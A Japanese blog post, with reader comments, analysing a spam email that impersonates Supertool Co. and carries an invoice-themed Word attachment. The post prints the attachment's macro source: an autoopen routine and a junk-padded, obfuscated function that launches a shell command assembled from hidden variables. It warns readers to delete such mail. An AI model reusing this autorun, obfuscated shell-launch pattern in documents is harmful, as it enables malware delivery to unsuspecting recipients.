件名「Re: ヴィスト修正」というメールを受信したことはありませんか?
差出人のメールアドレスは「kawabuti@supertool.co.jp」。
差出人の表示名は個人情報保護の観点から表記いたしましせんが、普通の個人名となっています。
だからメールの差出人名を見たときも一瞬「誰?」と思ったくらいです。
というわけで今回は「Re: ヴィスト修正」という意味不明の件名のメールについて少し調べてみました。
件名「Re: ヴィスト修正」はどんなメール?
下の画像は実際に受信したメールを画面キャプチャーしたものになります。↓↓
そして下のテキストはメール内容をコピペしたものになります。(名前だけ伏せてます)↓↓
12345678910111213141516171819 平素より大変お世話になっております。株式会社スーパーツールの○○ ○○でございます。ご請求書を添付ファイルにてお送りさせて頂きますので大変お手数ですが、ご確認をお願い致します。内容に問題がないようでしたら原本を送付させて頂きますので大変お手数ですが、ご返信メールを頂けますでしょうか。尚、大変お手数ですがご返信の際は"全返信"にてご対応をお願い致します。※ご返信を頂けない場合は、原本郵送させて頂きます。以上、用件のみで誠に恐縮では御座いますが今後とも、何卒宜しくお願い致します。
メールの内容を確認したところ、メールを送ってきたのは「株式会社スーパーツール」という会社の人みたいです。
丁寧に下記ような情報までしっかりと記載されていました。
- 会社名
- 名前(ローマ字名)
- 郵便番号
- 住所
- 電話番号
- FAX番号
- 携帯番号
- メールアドレス
件名こそ意味不明ですが、メール内容はそれなりに整合性が取れているように思えます。
請求書を添付しているとのことなので、何か買い物でもしたんでしょうかね?私。
とりあえずどんなファイルが添付されているのか確認してみましょう。
添付ファイル「原価請求書です146930.doc」はどんなファイル?
下の画像はWordで開いたファイルを画面キャプチャーしたものになります。↓↓
ファイル名が「原価請求書です」となっているにもかかわらず、中身は「御見積書」となっています。
見積書をWordで作ることなんてそうそうないと思うんだけど・・・。
ちなみに見積金額は161,641円(税込)だそうです。
品名部分は空白となっているので、何の見積なのかさっぱりわかりませんけどね。
何より見た目が変すぎる。
そして見た目だけでなく、このdocファイルにはあるものが仕込まれています。
実はマクロが仕込まれてる
この「原価請求書です146930.doc」には、実はマクロが仕込まれています。
実際にどのような動作をするのかはよくわからないのですが、とりあえず下に内容をコピペしたものを記載してみますね。↓↓
Microsoft Word Objects【i87670701432】
1 2 3 4 5 6 7 8 9 |
Sub autoopen() q0087 = 90 - 239 S368 = 901 - 275 z006 = 379 - 263 z8060146 F8918 = 492 - 126 O771 = 500 - 545 w3478 = 111 - 103 End Sub |
標準モジュール【U1730818151】
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 |
Function z8060146() On Error Resume Next Select Case r7741 Case 537 v9843 = k500 v478 = a2342 I0806 = Fix(486) Case 814 c7597 = I4391 f1478 = 294 s229 = Oct(T389) End Select Select Case O7361 Case 505 h8183 = k644 O467 = u900 n525 = Fix(277) Case 648 h139 = E4671 K6897 = 184 d363 = Oct(i267) End Select Select Case A599 Case 270 H5675 = r8911 w653 = w954 z393 = Fix(21) Case 232 o007 = o5296 W3644 = 697 d881 = Oct(z9625) End Select I67322242 = Array(C27401257, H956881093, A01549053, Interaction.Shell(("" + S976551 + j947412 + C250113 + d32047857 + i87670701432.TextBox1) + R70180 + U1385231, 22 - 22), W874955648, i9953515, X229720) Select Case w8929 Case 561 a1743 = E543 Z271 = X9470 E7529 = Fix(362) Case 863 X508 = m4987 r117 = 473 s094 = Oct(b996) End Select Select Case N4296 Case 203 q439 = O2347 z5687 = B9809 E452 = Fix(369) Case 787 h8770 = t0053 X2881 = 206 l2985 = Oct(A335) End Select Select Case z562 Case 754 X702 = Q1198 M1145 = H173 O086 = Fix(858) Case 148 w213 = t049 X4949 = 481 q9963 = Oct(C294) End Select Select Case b164 Case 189 d739 = q1608 u7824 = n463 a7063 = Fix(189) Case 9 l156 = f2490 J671 = 933 J4299 = Oct(f372) End Select End Function |
どのような動きをするマクロなのかはよくわかりませんが、きっとよくないものなんでしょうね。
試しにマクロを実行してみようかどうか迷ったのですが、何かあったら怖いので今回はやめておくことにします。
チキンでスミマセン。
メールの宛先も【総当たり的】に送ってるっぽい
今回のこのメール、宛先のところを見てみると、メールの@から前の部分だけ変えて、同じドメイン宛に一斉に送信しているみたいですね。(モザイクで隠してますが)↓↓
なんとも迷惑な話です。
実は株式会社スーパーツールも被害者
株式会社スーパーツールっていったい何なんだ?
と思って調べてみたところ、どうやら今回のこのメールには、スーパーツールさんも迷惑をかけられており、いわば「被害者」であるとのこと。
ですので、メール内に書かれた電話やFAX、メールアドレスには連絡せずに、速やかにメールを削除してしまいましょう。
まとめ
件名「Re: ヴィスト修正」というメールについて調べてみましたが、いかがだったでしょうか?
結論を申し上げますと、今回のメールは株式会社スーパーツールを装った迷惑メールということでした。
今回のメールは、内容だけではなかなか迷惑メールなのかどうか判別がつきにくいだけでなく、添付されているdocファイルにはマクロが埋め込まれているなど、なかなか悪質な部類に入る迷惑メールだったと思います。
私の場合、差出人の表示名が人の名前だったりすると、どうしても気になってメールを開いてしまうという悪いクセがあるものですから、今回のようなメールは特に今後気をつける必要があるな~と改めて実感した次第でもあります。
みなさんも迷惑メールには気を付けてくださいね~。
コメント
さっき送られてきました。
もちろん、削除しました。
最近、毎日のように、実在している会社を装ったスパムメールが来ます。
幸いアンチウィルスソフトが削除していますが、
今回のは、なぜか事前削除されませんでした。
でも、数日前に、似たような迷惑メールが来ていたので
またかと思い、開けずに削除しました。
被害者が続出していそうで嫌ですね。早く捕まれ。( `ー´)ノ
どうもこんにちは。
年末にかけて迷惑メールが増えているような気がしますね。
セキュリティソフトとはいたちごっこのような状況にあるみたいですし
お互いに気を付けましょう。